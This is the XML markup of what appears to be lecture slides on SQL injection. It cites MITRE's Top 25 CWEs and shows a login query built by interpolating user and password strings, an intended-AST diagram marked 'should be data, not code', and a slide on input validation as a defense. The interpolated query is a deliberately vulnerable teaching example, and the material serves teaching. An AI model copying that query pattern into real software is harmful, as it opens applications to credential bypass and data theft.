                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="800"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="597"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="597"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1100"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="601"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="601"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="603"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="603"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="24" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="594"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1000"/>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0" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="594" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="595" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="597" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="599" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="601" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="60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1A496-8D32-391C-896B-00D122B6EE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F13C4E-26F0-EFED-7EA4-3FFA5CB569CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12330550" y="4812042"/>
            <a:ext cx="11323352" cy="8173708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B4FEEBD-54BA-7ABC-9427-679FDED69719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="659878" y="3246445"/>
            <a:ext cx="11363792" cy="9698934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418D9CC2-0B84-73A8-E4DE-7A1B590482F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659876" y="184152"/>
            <a:ext cx="22994026" cy="3016249"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Data source: MITRE Top 25 CWEs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337273621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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="16828999" y="9761181"/>
            <a:ext cx="1462266" cy="1914131"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Shape 607"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="14809479" y="10121688"/>
            <a:ext cx="1292670" cy="1893461"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Shape 608"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13870415" y="8007894"/>
            <a:ext cx="2705592" cy="1906901"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Shape 609"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10839627" y="10121688"/>
            <a:ext cx="1708248" cy="1893461"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Shape 610"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9018585" y="10104337"/>
            <a:ext cx="1910812" cy="1910812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Shape 611"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10884649" y="8015208"/>
            <a:ext cx="2101745" cy="1782430"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Shape 612"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="11605097" y="5779681"/>
            <a:ext cx="1910812" cy="1910812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Shape 613"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9003025" y="6092914"/>
            <a:ext cx="473058" cy="1910812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Shape 614"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6179586" y="6092914"/>
            <a:ext cx="1910811" cy="1910812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Shape 616"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537737" y="2751016"/>
            <a:ext cx="17732417" cy="1498486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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 “SELECT * FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       WHERE Name=‘#{user}’ AND Password=‘#{pass}’;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Shape 617"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5917395" y="5250243"/>
            <a:ext cx="7183130" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>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dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Shape 618"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845576" y="7186183"/>
            <a:ext cx="1736001"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t>*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="Shape 619"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7992067" y="7186183"/>
            <a:ext cx="2494973"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t>Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Shape 620"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12329097" y="7186183"/>
            <a:ext cx="2494973" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>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dirty="0"/>
              <a:t>AND</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="Shape 621"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10227996" y="9122122"/>
            <a:ext cx="1239045" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>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t>=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="Shape 622"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8446894" y="11058062"/>
            <a:ext cx="2124133"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dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>ame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Shape 623"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11141173" y="11058062"/>
            <a:ext cx="2324138"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i="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:endParaRPr i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Shape 624"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15906546" y="9122122"/>
            <a:ext cx="1239045" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>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t>=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Shape 625"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13956793" y="11035152"/>
            <a:ext cx="2998042"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dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>assword</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Shape 626"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17088028" y="11035152"/>
            <a:ext cx="2324138"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i="1" dirty="0"/>
              <a:t>pass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Shape 627"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11191771" y="11108925"/>
            <a:ext cx="2324138" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
          </a:blipFill>
          <a:ln w="190500">
            <a:solidFill>
              <a:schemeClr val="accent5"/>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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Shape 628"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17664755" y="5634566"/>
            <a:ext cx="4374851" cy="1590676"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 26163"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>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p>
            <a:pPr algn="l">
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Should be </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:t>, not </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493612" y="9357798"/>
            <a:ext cx="4084175" cy="2452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t>Intended AST for parsed SQL query</a:t>
            </a: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6" name="Shape 591">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4380064-D92D-DFAA-E8AC-D8A4B5B6D634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4625779" y="448562"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The underlying issue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2731681650"/>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27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="627"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="628"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="628"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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animBg="1" advAuto="0"/>
      <p:bldP spid="628"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387452" y="632498"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="566674">
              <a:defRPr sz="10864"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Defense: Input Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Shape 631"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4136162" y="3110533"/>
